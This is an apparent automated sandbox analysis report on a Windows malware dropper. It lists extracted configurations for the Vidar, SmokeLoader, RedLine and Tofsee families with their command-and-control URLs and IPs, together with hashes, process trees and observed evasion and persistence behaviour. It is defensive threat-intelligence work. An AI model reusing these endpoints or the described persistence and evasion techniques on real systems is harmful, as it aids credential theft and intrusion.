onlylogger | 385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999

Analysis

max time kernel
135s
max time network
167s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
22-02-2022 03:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999.exe
Size

3.9MB
MD5

017ecbd526844fa6c15b8e879ffd5212
SHA1

32d4ad9973ec2bebd4ba28b4f896b912fb8c87c4
SHA256

385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999
SHA512

e09615554addbd2fb8ac7f72036cfae16732ffb0f2e230d49c30ba9ec9d757b33ea6ae6d396f8567d50dd5c6e58fcc31cdf8944a3b4316ca3613d96380c43d94

Malware Config

Extracted

Family

vidar

Version

39.9

Botnet

706

https://prophefliloc.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

OLKani

ataninamei.xyz:80

Extracted

Family

redline

Botnet

cosmos

45.67.231.245:10429

Extracted

Family

tofsee

patmushta.info

ovicrush.cn

Extracted

Family

redline

Botnet

ruzzki

5.182.5.22:32245

Attributes

auth_value
d8127a7fd667fc38cff03ff9ec89f346

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 11 IoCs

Processes:

resource	yara_rule
behavioral2/memory/180-237-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/4460-266-0x0000000000470000-0x00000000006A1000-memory.dmp	family_redline
behavioral2/memory/4460-273-0x0000000000472000-0x00000000004A8000-memory.dmp	family_redline
behavioral2/memory/4744-272-0x00000000009F0000-0x0000000000A0E000-memory.dmp	family_redline
behavioral2/memory/4460-288-0x0000000000470000-0x00000000006A1000-memory.dmp	family_redline
behavioral2/memory/4460-289-0x0000000000470000-0x00000000006A1000-memory.dmp	family_redline
behavioral2/memory/832-302-0x00000000005C0000-0x0000000000753000-memory.dmp	family_redline
behavioral2/memory/4336-306-0x0000000000920000-0x0000000000AE2000-memory.dmp	family_redline
behavioral2/memory/4988-304-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4432-307-0x0000000000920000-0x0000000000AE2000-memory.dmp	family_redline
behavioral2/memory/4356-305-0x0000000000920000-0x0000000000AE2000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Suspicious use of NtCreateProcessExOtherParentProcess 14 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeB_bff2T4G6cqvc7fB94uMZO2.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 736 created 1280	736	WerFault.exe	setup_install.exe
PID 4716 created 4192	4716	WerFault.exe	d1KD7boUYITDfV4ldu4GYrik.exe
PID 5112 created 4840	5112	WerFault.exe	u5HuDSN61Q5pVzKTJCIXV3jd.exe
PID 4912 created 4184	4912	WerFault.exe	c16zuKlUyVGWNca6uwVIqHf8.exe
PID 5048 created 4524	5048	WerFault.exe	R3kimMgFPYgAeOrhj4CyKeMX.exe
PID 5040 created 4324	5040	WerFault.exe	BeZcPSYwUlgdq4R_UcwLNDfJ.exe
PID 5056 created 4332	5056	WerFault.exe	F_yQ5w_D1E2yEyJ3gHsDK_1G.exe
PID 4992 created 4288	4992	WerFault.exe	CfUyEvxxRL5Szh6kGVp4IPfg.exe
PID 4988 created 4324	4988	B_bff2T4G6cqvc7fB94uMZO2.exe	BeZcPSYwUlgdq4R_UcwLNDfJ.exe
PID 2684 created 4332	2684	WerFault.exe	F_yQ5w_D1E2yEyJ3gHsDK_1G.exe
PID 5024 created 4288	5024	WerFault.exe	CfUyEvxxRL5Szh6kGVp4IPfg.exe
PID 3984 created 4840	3984	WerFault.exe	u5HuDSN61Q5pVzKTJCIXV3jd.exe
PID 5232 created 4524	5232	WerFault.exe	R3kimMgFPYgAeOrhj4CyKeMX.exe
PID 5780 created 4192	5780	WerFault.exe	d1KD7boUYITDfV4ldu4GYrik.exe

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4192-264-0x00000000035A0000-0x00000000035E4000-memory.dmp	family_onlylogger
behavioral2/memory/4192-277-0x0000000000400000-0x0000000000447000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2628-217-0x0000000004900000-0x000000000499D000-memory.dmp	family_vidar
behavioral2/memory/2628-218-0x0000000000400000-0x00000000004A1000-memory.dmp	family_vidar

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\libstdc++-6.dll	aspack_v212_v242

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 64 IoCs

Processes:

setup_install.exesonia_5.exesonia_3.exesonia_2.exesonia_4.exesonia_8.exesonia_7.exesonia_1.exesonia_6.exesonia_9.exesonia_5.tmpsonia_1.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exechrome2.exejfiag3g_gg.exejfiag3g_gg.exesetup.exewinnetdriv.exesonia_8.exeservices64.exejD9EuR4xXuLRvbqoJiTAQk1P.exeB_bff2T4G6cqvc7fB94uMZO2.exeMJGc8tEmO8iAMzorOZWCjESu.exeVn6IZxySedMUxPieZ2hiuDzm.exerSVAQ1FGmQWRWtwEk5rGvnmZ.exec16zuKlUyVGWNca6uwVIqHf8.exed1KD7boUYITDfV4ldu4GYrik.exeoTXQ24rCEMhZJFguArsFP_yJ.exelkD6OGvmC6_qaaC1cqneKzYq.exeCfUyEvxxRL5Szh6kGVp4IPfg.exeF_yQ5w_D1E2yEyJ3gHsDK_1G.exeBeZcPSYwUlgdq4R_UcwLNDfJ.exeF_yQ5w_D1E2yEyJ3gHsDK_1G.exe6jzApayXqdizT96dwKKhNi5o.exewUbzyNWhBN8Ork98ALyFjH4D.exewVaqIzIvwM4pU7gYMNW_uVID.exeR3kimMgFPYgAeOrhj4CyKeMX.exezvUxDCnP5sLGxoX0etMPLih5.exenfH16fjssB2hzfy7iVdsukkq.exeZlP6mQgQEGN6sXTF06rRqLE2.exeJ9487GyEmrYySGWB4t06yFiy.exe4wcRd1jP_K4AKg4UVSON_Per.exelc7cPTy72CJmaMfHiLhvN3q1.exeu5HuDSN61Q5pVzKTJCIXV3jd.exeFVORPh98FnduTyCanrl4GF56.exelP91KmJPJNT_4XHZlRLTwaU6.exeInstall.exewsgQaZyRBY6I22XzDjrAFg3B.exeInstall.exe5736J.exe94F8L.exe94F8L.exe94F8L.exeDB33E.exeB_bff2T4G6cqvc7fB94uMZO2.exeDB33E.exe1HFE7DI6GFH9L2H.exeFVORPh98FnduTyCanrl4GF56.exe

pid	process
1280	setup_install.exe
3104	sonia_5.exe
2628	sonia_3.exe
3464	sonia_2.exe
3948	sonia_4.exe
3920	sonia_8.exe
876	sonia_7.exe
3916	sonia_1.exe
4004	sonia_6.exe
1816	sonia_9.exe
1560	sonia_5.tmp
2140	sonia_1.exe
4088	jfiag3g_gg.exe
456	jfiag3g_gg.exe
2924	jfiag3g_gg.exe
2536	jfiag3g_gg.exe
3996	jfiag3g_gg.exe
3552	jfiag3g_gg.exe
1520	chrome2.exe
112	jfiag3g_gg.exe
3240	jfiag3g_gg.exe
3156	setup.exe
2380	winnetdriv.exe
180	sonia_8.exe
3464	services64.exe
1404	jD9EuR4xXuLRvbqoJiTAQk1P.exe
3204	B_bff2T4G6cqvc7fB94uMZO2.exe
4104	MJGc8tEmO8iAMzorOZWCjESu.exe
4168	Vn6IZxySedMUxPieZ2hiuDzm.exe
4176	rSVAQ1FGmQWRWtwEk5rGvnmZ.exe
4184	c16zuKlUyVGWNca6uwVIqHf8.exe
4192	d1KD7boUYITDfV4ldu4GYrik.exe
4212	oTXQ24rCEMhZJFguArsFP_yJ.exe
4220	lkD6OGvmC6_qaaC1cqneKzYq.exe
4288	CfUyEvxxRL5Szh6kGVp4IPfg.exe
4300	F_yQ5w_D1E2yEyJ3gHsDK_1G.exe
4324	BeZcPSYwUlgdq4R_UcwLNDfJ.exe
4332	F_yQ5w_D1E2yEyJ3gHsDK_1G.exe
4396	6jzApayXqdizT96dwKKhNi5o.exe
4452	wUbzyNWhBN8Ork98ALyFjH4D.exe
4460	wVaqIzIvwM4pU7gYMNW_uVID.exe
4524	R3kimMgFPYgAeOrhj4CyKeMX.exe
4544	zvUxDCnP5sLGxoX0etMPLih5.exe
4652	nfH16fjssB2hzfy7iVdsukkq.exe
4660	ZlP6mQgQEGN6sXTF06rRqLE2.exe
4692	J9487GyEmrYySGWB4t06yFiy.exe
4744	4wcRd1jP_K4AKg4UVSON_Per.exe
4820	lc7cPTy72CJmaMfHiLhvN3q1.exe
4840	u5HuDSN61Q5pVzKTJCIXV3jd.exe
4860	FVORPh98FnduTyCanrl4GF56.exe
4872	lP91KmJPJNT_4XHZlRLTwaU6.exe
3648	Install.exe
4896	wsgQaZyRBY6I22XzDjrAFg3B.exe
4332	F_yQ5w_D1E2yEyJ3gHsDK_1G.exe
3816	Install.exe
832	5736J.exe
4432	94F8L.exe
4336	94F8L.exe
4356	94F8L.exe
2756	DB33E.exe
4988	B_bff2T4G6cqvc7fB94uMZO2.exe
5156	DB33E.exe
5272	1HFE7DI6GFH9L2H.exe
5356	FVORPh98FnduTyCanrl4GF56.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exeJ9487GyEmrYySGWB4t06yFiy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	J9487GyEmrYySGWB4t06yFiy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	J9487GyEmrYySGWB4t06yFiy.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

services64.exe385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999.exesonia_1.exechrome2.exesonia_7.exejD9EuR4xXuLRvbqoJiTAQk1P.exeoTXQ24rCEMhZJFguArsFP_yJ.exewsgQaZyRBY6I22XzDjrAFg3B.exesonia_4.exe6jzApayXqdizT96dwKKhNi5o.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	services64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	sonia_1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	chrome2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	sonia_7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	jD9EuR4xXuLRvbqoJiTAQk1P.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	oTXQ24rCEMhZJFguArsFP_yJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	wsgQaZyRBY6I22XzDjrAFg3B.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	sonia_4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	6jzApayXqdizT96dwKKhNi5o.exe

Loads dropped DLL 13 IoCs

Processes:

setup_install.exesonia_5.tmprSVAQ1FGmQWRWtwEk5rGvnmZ.exeZlP6mQgQEGN6sXTF06rRqLE2.exe

pid	process
1280	setup_install.exe
1280	setup_install.exe
1280	setup_install.exe
1280	setup_install.exe
1280	setup_install.exe
1280	setup_install.exe
1560	sonia_5.tmp
4176	rSVAQ1FGmQWRWtwEk5rGvnmZ.exe
4176	rSVAQ1FGmQWRWtwEk5rGvnmZ.exe
4176	rSVAQ1FGmQWRWtwEk5rGvnmZ.exe
4176	rSVAQ1FGmQWRWtwEk5rGvnmZ.exe
4660	ZlP6mQgQEGN6sXTF06rRqLE2.exe
4176	rSVAQ1FGmQWRWtwEk5rGvnmZ.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/4692-287-0x00000000002F0000-0x00000000006B3000-memory.dmp	themida
behavioral2/memory/4692-293-0x00000000002F0000-0x00000000006B3000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

DB33E.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	DB33E.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

J9487GyEmrYySGWB4t06yFiy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	J9487GyEmrYySGWB4t06yFiy.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

286 ipinfo.io
32 ipinfo.io
33 ipinfo.io
35 ip-api.com
260 ipinfo.io
261 ipinfo.io
Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe

flow	ioc
286	ipinfo.io
32	ipinfo.io
33	ipinfo.io
35	ip-api.com
260	ipinfo.io
261	ipinfo.io

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

wVaqIzIvwM4pU7gYMNW_uVID.exeJ9487GyEmrYySGWB4t06yFiy.exe5736J.exeDB33E.exe94F8L.exe94F8L.exe94F8L.exeDB33E.exe

pid	process
4460	wVaqIzIvwM4pU7gYMNW_uVID.exe
4692	J9487GyEmrYySGWB4t06yFiy.exe
832	5736J.exe
2756	DB33E.exe
4356	94F8L.exe
4336	94F8L.exe
4432	94F8L.exe
5156	DB33E.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

sonia_8.exeB_bff2T4G6cqvc7fB94uMZO2.exeFVORPh98FnduTyCanrl4GF56.execfvunpwz.exe

description	pid	process	target process
PID 3920 set thread context of 180	3920	sonia_8.exe	sonia_8.exe
PID 4300 set thread context of 4332	4300		F_yQ5w_D1E2yEyJ3gHsDK_1G.exe
PID 3204 set thread context of 4988	3204	B_bff2T4G6cqvc7fB94uMZO2.exe	B_bff2T4G6cqvc7fB94uMZO2.exe
PID 4860 set thread context of 5356	4860	FVORPh98FnduTyCanrl4GF56.exe	FVORPh98FnduTyCanrl4GF56.exe
PID 4864 set thread context of 5512	4864	cfvunpwz.exe	svchost.exe

Drops file in Program Files directory 3 IoCs

Processes:

jD9EuR4xXuLRvbqoJiTAQk1P.exezvUxDCnP5sLGxoX0etMPLih5.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	jD9EuR4xXuLRvbqoJiTAQk1P.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	jD9EuR4xXuLRvbqoJiTAQk1P.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	zvUxDCnP5sLGxoX0etMPLih5.exe

Drops file in Windows directory 4 IoCs

Processes:

TiWorker.exesetup.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\WinSxS\pending.xml	TiWorker.exe
File created	C:\Windows\winnetdriv.exe	setup.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 13 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
672	1280	WerFault.exe	setup_install.exe
5064	4192	WerFault.exe	d1KD7boUYITDfV4ldu4GYrik.exe
4956	4524	WerFault.exe	R3kimMgFPYgAeOrhj4CyKeMX.exe
4720	4840	WerFault.exe	u5HuDSN61Q5pVzKTJCIXV3jd.exe
4752	4184	WerFault.exe	c16zuKlUyVGWNca6uwVIqHf8.exe
5384	4840	WerFault.exe	u5HuDSN61Q5pVzKTJCIXV3jd.exe
5604	4524	WerFault.exe	R3kimMgFPYgAeOrhj4CyKeMX.exe
6140	4192	WerFault.exe	d1KD7boUYITDfV4ldu4GYrik.exe
4100	4396	WerFault.exe	6jzApayXqdizT96dwKKhNi5o.exe
4408	4864	WerFault.exe	cfvunpwz.exe
5420	6056	WerFault.exe	0l4CTBp49adTe7tc6jS2brmy.exe
3204	4192	WerFault.exe	d1KD7boUYITDfV4ldu4GYrik.exe
3248	6056	WerFault.exe	0l4CTBp49adTe7tc6jS2brmy.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

F_yQ5w_D1E2yEyJ3gHsDK_1G.exesonia_2.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F_yQ5w_D1E2yEyJ3gHsDK_1G.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F_yQ5w_D1E2yEyJ3gHsDK_1G.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sonia_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sonia_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sonia_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F_yQ5w_D1E2yEyJ3gHsDK_1G.exe

Checks processor information in registry 2 TTPs 20 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeMusNotifyIcon.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MusNotifyIcon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MusNotifyIcon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3620 schtasks.exe
4808 schtasks.exe
3140 schtasks.exe
5164 schtasks.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

5596 tasklist.exe

pid	process
3620	schtasks.exe
4808	schtasks.exe
3140	schtasks.exe
5164	schtasks.exe

pid	process
5596	tasklist.exe

Enumerates system info in registry 2 TTPs 14 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeInstall.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5724 taskkill.exe

pid	process
5724	taskkill.exe

Modifies data under HKEY_USERS 49 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132901504536958703"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1"	svchost.exe
